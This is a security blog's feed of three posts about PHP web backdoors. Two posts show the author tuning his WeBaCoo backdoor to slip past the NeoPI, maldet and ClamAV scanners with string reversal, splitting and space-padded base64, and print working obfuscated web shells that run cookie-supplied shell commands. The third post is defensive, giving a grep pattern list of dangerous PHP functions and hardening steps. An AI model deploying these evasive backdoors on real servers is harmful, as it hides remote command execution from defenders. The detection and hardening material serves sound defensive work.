Anestis Bechtsoudis » malware detection http://bechtsoudis.com Driven by Passion for Challenges Tue, 01 Jul 2014 12:30:55 +0000 en-US hourly 1 http://wordpress.org/?v=3.9.2 Maths behind web shell code detection http://bechtsoudis.com/2011/12/16/maths-behind-web-shell-code-detection/#utm_source=rss&utm_medium=rss&utm_campaign=maths-behind-web-shell-code-detection http://bechtsoudis.com/2011/12/16/maths-behind-web-shell-code-detection/#comments Fri, 16 Dec 2011 16:36:20 +0000 http://bechtsoudis.com/?p=1049 Trying to enhance WeBaCoo’s stealth behavior I continuously examine various tools and methods used to detect hidden web backdoor shell code at infected hosts. The latest tool that came into my sight is NeoPI, a python script that uses various statistical methods to discover potential obfuscated and encrypted content within text/script files. NeoPI follows a very interesting approach by ranking potential malicious files based on Entropy, Longest Word and Index of Coincidence tests. Unfortunately, WeBaCoo’s base64 obfuscated backdoor code hasn’t passed undetected from NeoPI, ranked within the top 10 in a regular web server setup. Consequently, I proceeded to a further analysis of the tool in a try to find ways to effectively bypass its tests.

I mentioned NeoPI in one of my previous posts about web backdoor detection, although till recently I haven’t realized how useful it can prove under certain circumstances. The tool has five testing categories:

  1. Entropy: Measure file’s uncertainty associated with the ascii charset (more info)
  2. Longest Word: Large strings might form encrypted/obfuscated code
  3. Index of Coincidence: Low IC indicates potential encryption/obfuscation (more info)
  4. Signature: Search files for “dangerous” strings
  5. Compression: Compare files’ compression ratio (more info)

To examine NeoPI’s results in a real setup, I established a web server debian VM with 3 CMS installations (Joomla, WordPress and Coppermine). Under the web root path I have placed two WeBaCoo’s generated files: webacoo.php (base64 obfuscated) and webacoo_raw.php (raw php code).

In order to make results more accurate, the file extension regular expression feature was used to search only for server side PHP files. The initial scan report for all the tests under the webroot path is as follow:

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.7306		/var/www/webacoo.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372679517799
 
[[ Top 10 lowest IC files ]]
  0.0198		/var/www/webacoo.php
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     122		/var/www/webacoo.php
     202		/var/www/blog/wp-admin/js/revisions-js.php
     528		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     912		/var/www/plugins/content/jw_allvideos/includes/helper.php
     984		/var/www/modules/mod_archive/helper.php
    1100		/var/www/libraries/bitfolge/vcard.php
    1210		/var/www/administrator/components/com_content/elements/article.php
    1240		/var/www/gallery/addfav.php
    1246		/var/www/administrator/components/com_installer/admin.installer.php
    1258		/var/www/administrator/components/com_config/views/component/view.php

While webacoo_raw.php successfully passed the tests, obfuscated code (webacoo.php) didn’t have the same luck. Entropy and Index of Coincidence tests have the highest scores, marking the tool as a possible malicous file. Despite these two scores, the obfuscated code has a high score at the longest word test too, but it is not observable in the lab setup because of the CMS long string matching and validating features.

These high scores are due to base64 encoding payload string. In order to bypass them, the generated code must implement some new features to trick these tests. My first thought was to split the encoded data into smaller chunks which are finally concatenated to form the overall payload. Although, after some tests this proved insufficient to bypass IC and Entropy tests. A second approach is to insert some spaces into the encoded data (space is not a valid base64 character) and delete them with a replace function before decode the data.

The question now is: After how many characters will a new space be inserted in order to have the best result? Trying to find the most efficient value, I created various code files with different group sizes (after 1,5,10,20 characters) between spaces and run NeoPI to compare the results.

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$
[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  5.7646		/var/www/pwn/webacoo_new20.php
  5.7306		/var/www/pwn/webacoo.php
  5.6999		/var/www/pwn/webacoo_new10.php
  5.5322		/var/www/pwn/webacoo_new5.php
  5.1328		/var/www/pwn/webacoo_raw.php
  4.2037		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 longest word files ]]
     295		/var/www/pwn/webacoo.php
      94		/var/www/pwn/webacoo_raw.php
      51		/var/www/pwn/webacoo_new1.php
      51		/var/www/pwn/webacoo_new10.php
      51		/var/www/pwn/webacoo_new5.php
      51		/var/www/pwn/webacoo_new20.php
 
[[ Average IC for Search ]]
0.040872937004
 
[[ Top 10 lowest IC files ]]
  0.0194		/var/www/pwn/webacoo_new20.php
  0.0198		/var/www/pwn/webacoo.php
  0.0224		/var/www/pwn/webacoo_new10.php
  0.0301		/var/www/pwn/webacoo_raw.php
  0.0338		/var/www/pwn/webacoo_new5.php
  0.2009		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 signature match counts ]]
       1		/var/www/pwn/webacoo.php
       1		/var/www/pwn/webacoo_raw.php
       1		/var/www/pwn/webacoo_new1.php
       1		/var/www/pwn/webacoo_new10.php
       1		/var/www/pwn/webacoo_new5.php
       1		/var/www/pwn/webacoo_new20.php
 
[[ Top 10 compression match counts ]]
  0.8114		/var/www/pwn/webacoo_new10.php
  0.8101		/var/www/pwn/webacoo_new20.php
  0.7993		/var/www/pwn/webacoo.php
  0.7947		/var/www/pwn/webacoo_new5.php
  0.7593		/var/www/pwn/webacoo_raw.php
  0.5407		/var/www/pwn/webacoo_new1.php
 
[[ Top cumulative ranked files ]]
       8		/var/www/pwn/webacoo_new20.php
       9		/var/www/pwn/webacoo.php
      11		/var/www/pwn/webacoo_new10.php
      17		/var/www/pwn/webacoo_new5.php
      17		/var/www/pwn/webacoo_raw.php
      22		/var/www/pwn/webacoo_new1.php

webacoo_new20.php (insert space after 20 characters) has the worst behavior (even worse than the original webacoo.php with no spaces inserted). On the other hand webacoo_new1.php (space after each character) has the lowest score in every partial test, making it the most efficient choice (even better from the raw code).

Consequently, the new final backdoor file that is capable to pass undetected from NeoPI is as follow:

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
  5.6060		/var/www/blog/wp-config.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372700176166
 
[[ Top 10 lowest IC files ]]
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
  0.0273		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     199		/var/www/blog/wp-admin/js/revisions-js.php
     521		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     907		/var/www/plugins/content/jw_allvideos/includes/helper.php
     977		/var/www/modules/mod_archive/helper.php
    1094		/var/www/libraries/bitfolge/vcard.php
    1203		/var/www/administrator/components/com_content/elements/article.php
    1233		/var/www/gallery/addfav.php
    1240		/var/www/administrator/components/com_installer/admin.installer.php
    1252		/var/www/administrator/components/com_config/views/component/view.php
    1264		/var/www/xmlrpc/includes/framework.php

 

This new technique to bypass statistical detection methods will be implemented in WeBaCoo’s next release.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/12/16/maths-behind-web-shell-code-detection/feed/ 4
Bypass base64 decoder detection http://bechtsoudis.com/2011/12/11/bypass-base64-decoder-detection/#utm_source=rss&utm_medium=rss&utm_campaign=bypass-base64-decoder-detection http://bechtsoudis.com/2011/12/11/bypass-base64-decoder-detection/#comments Sun, 11 Dec 2011 19:36:41 +0000 http://bechtsoudis.com/?p=1018 Almost two weeks after WeBaCoo’s release, I started to organize the results from various tests under different protection/detection tools for a comprehensive writeup. Something that draw my attention is how easily some malware scanning tools mark as “threat” WeBaCoo’s generated backdoor code. A simple use of the base64 decoder function is enough to trigger scanner’s content matching rulesets no matter what the processing data are. Additionally to this strict approach, I came forward recently in the Internet with some official web backdoor detection tutorials including content matching checks for the decoder function. These two things led me to a small research for finding tricks to bypass such content matching mechanisms.

A list of tools and scripts that marked as “threat” WeBaCoo’s generated code based on the base64 decoder use, is as following (check the first image gallery at the end of the post for report screenshots):

After inspecting how the above tools work, I thought two main methods that can be used to trick the base64 encoder content matching rules: string reversing and string splitting. These two methods can be combined to create more tricky code, always taking into account the least possible character use. WeBaCoo generates PHP backdoor code, so I will work these methods under PHP. Although the same concept can be applied to other languages too.

 

String Reversing

Lucky for us PHP provides the strrev() function in order to easily reverse a string. Knowing that base64_decoder was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that our concept works before proceeding to backdoor alterations.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>
root@testbed:~# php reverse.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/reverse.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...
maldet(4332): {scan} file list completed, found 1 files...
maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0
maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

 

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks, that can be later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>
root@testbed:~# php split.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/split.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...
maldet(4509): {scan} file list completed, found 1 files...
maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0
maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

 

Knowing that the above two techniques work against decoder’s string name detection, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination that is used in the new backdoor code. I will conduct the same tests to see if the new backdoor code successfully passes all of them. You can see the results in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

 

These two techniques will be implemented in WeBaCoo’s next release after I conclude to the more efficient ways of use.

 

Initial Code Report Results

New Code Report Results

 
DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.
 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/12/11/bypass-base64-decoder-detection/feed/ 2
Detect & Protect from PHP Backdoor Shells http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/#utm_source=rss&utm_medium=rss&utm_campaign=detect-protect-from-php-backdoor-shells http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/#comments Wed, 15 Jun 2011 13:26:53 +0000 http://bechtsoudis.com/?p=476 Recently I undertook to investigate a web server hacking incident. It was an up-to-date debian machine (apache2+php5+mysql) that hosted a joomla CMS for a logistic website. The web admin has installed a joomla extension plugin which allows users to put custom php code in their articles. The attacker has “phished” valid login credentials for the website and published an article in which he has placed a simple php backdoor shell. The malicious code haven’t been noticed from the moderator that approved the article and so the article normally come to public.

After finishing the forensic procedures, I found out that the attacker used the weevely tool to generate the php backdoor shell that he injected in the article. I have never experienced a relative php backdoor incident resulting in a two-day exhaustive investigation. After finding the problem and cleaning the infection, I conducted a little research for php backdoor detection/protection tools & scripts.

 

In the rest of the article I will summarize the basic steps of detecting and protecting from php malicious code. Of course there exist different approaches in order to detect/protect web malicious activities according to the working framework, although I try to provide a general guideline using tools and procedures that I have used in my working cases.

 

Step1 – PHP Configuration Security Auditing

PHP is a very powerful programing language but the running configuration must be tweaked very carefully in order to minimize the security holes. There exist several security auditing tools and scripts, but from the ones I have tested I preferred the phpsecinfo tool. phpsecinfo parse the php configuration and generates a web report with detailed information and improvement suggestions.

Here are some screenshots from an example report:

 

 

Step2 – Running Web Platform Configuration

Popular web CMS and platforms offer a large amount of extensions and plugins for their users. Inexperienced web developers & web admins tend to use as many as possible plugins, believing that this will make the website more attractive or functional. Although this approach from the security perspective is wrong, because more plugins result in more security risks.

The developers of these famous web platforms follow the latest security exploits and create relative patches, securing the core platform from already known attacks. On the other side, plugins’ source code is not that regularly revised and tested for security holes putting into great danger the whole platform.

Usually, most plugins follow the above rule, although there exist developers that tactically update their plugins’ source code providing sufficient security level. So you must not install unnecessary plugins in your web platform and in case that you have to, carefully investigate plugin’s source code and how it affects the core platform. Additionally, you should manually install the plugins in order to careful look and tweak the configuration variables and paths.

 

 

Step3 – Detection Tools & Scripts

PHP backdoor shells use php functions that execute external commands in the host machine. PHP users know these functions, so with a simple grep script someone can detect the files in which such function occur and investigate them to see if their are legitimate or malicious. Here is a simple bash script that searches for system functions, file streams and base64 encrypted code:

 

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
 
#------------------------------------------------#
# Search web files for potential malicious code. #
#------------------------------------------------#
 
SEARCH_DIR="/var/www"
PATTERNS="passthru|shell_exec|system|phpinfo|base64_decode|popen|exec|proc_open|pcntl_exec|python_eval|fopen|fclose|readfile"
 
grep -RPl --include=*.{php,txt} "($PATTERNS)" $SEARCH_DIR
 
exit 0

 

Going one step further from simple search scripts there exist NeoPI. NeoPI is a python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. I have tested NeoPI in the incident I mentioned, and the tool successfully located the malicious file and put it higher in the rank. Although, based on its statistical methods, NeoPI might put malicious files lower in the rank giving bigger risk percentage to legitimate files and disorientate your investigation.

 

For more advanced and comprehensive reports someone can turn into a malware scanner. In the incident that I examined I have used the LMD (Linux Malware Detect) scanner. This was the first time I used this tool and I have to say that I am very satisfied with its functionality. To furthermore test the tool, I created four other php backdoors using know scripts from pen-test frameworks, and LMD successfully found all of them.

 

And of course there exist the powerful ClamAV antivirus but I didn’t have time to setup it and test its results for the php backdoors that I mentioned. Although from what I have read in the web, it is very efficient and have successfully located php backdoors and malware code.

 

 

Step4 – Protection

Protection countermeasures are formed using the tools and information from the previous steps. Here are some bullets in the PHP configuration that sysadmins must pay attention:

    • allow_url_fopen: PHP file functions are allowed to include remote files from external FTP or HTTP locations. This option is enabled by default installation and is rarely used.
    • Dangerous PHP functions: Using the disable_functions field in the php.ini, disable all the dangerous PHP system functions (system, shell_exec, passthru etc) that might be used from malicious codes. Be careful with the rare cases in which some web platforms need some of these function.
    • open_basedir: Use this variable in the php.ini configuration to limit file operations to the defined directory and low.
    • web user permission: Carefully examine the web user access level and its permission.

 

By carefully editing the PHP security audit report options, adopting an automate malware detection tool and examining the bullets mentioned above, an adequate security level is established for your running web servers and platforms.

 

 

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/feed/ 4